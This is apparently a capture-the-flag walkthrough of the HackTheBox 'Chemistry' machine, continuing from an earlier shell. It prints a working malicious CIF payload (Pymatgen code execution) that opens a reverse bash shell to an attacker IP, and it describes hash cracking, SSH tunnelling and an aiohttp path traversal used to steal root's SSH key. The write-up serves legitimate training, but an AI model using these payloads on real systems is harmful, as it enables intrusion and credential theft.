HackTheBox Chemistry - Part 2

This is the second part of the Chemistry Box in htb. Since we got a shell in the previous attempt, we will continue from there.

There is a DB file in the /instance folder. Let's try to access the database.

app@chemistry:~/instance$ ls
ls
database.db
app@chemistry:~/instance$ sqlite3 database.db        

Something is wrong with the shell. The above command fails. Let's retry with a better bash shell.

Made some small changes to the evil CIF file.

data_5yOhtAoR
_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.6/443 0>&1'");0,0,0'


_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "data_5yOhtAoR
_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.16/4444 0>&1'");0,0,0'


_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "        

and listen to connections using nc -lnvp 4444. Now let's upgrade the shell using pty. This will give it autocompletion, tab completion, and other features (didn't get them though, but it's stable).

Next, let's connect to the database and try to access some data.

The user table has hashed passwords. Let's try to crack it using CrackStation.

We got the Rosa user password. Now let's access Rosa's profile.

Now we have the user flag. Next, we need the root flag. Let's enumerate other services running on the host.

There is a monitoring script from the root user at port 8080:

In order to access that, we need port forwarding. The service is running on localhost in a remote server; there is no way for someone external to access the server, so we need to tunnel the traffic to a local port.

ssh -L 8080:127.0.0.1:8080 -N -vv rosa@10.10.11.38        

8080:127.0.0.1:8080 -> local_port:remote_host:remote_port

It turned out to be a site monitoring service.

In the network tab, it says it uses aiohttp, let's look for an exploit in 3.9.1

There is a path traversal issue which we can take into consideration:

On reading through, you will understand that the static file path has the issue of path traversal. Here, the static path is not /static, it's /assets.

Now let's search for the root SSH secret.

Store it in a local file and SSH into root.

Thanks for following along, this was quite an interesting challenge, hope you have learned new stuff. Follow for more.

Try out LiveAPI. Get your backend APIs documented automatically. It supports 90+ backend frameworks and 20+ programming languages. Please give it a try and provide your feedback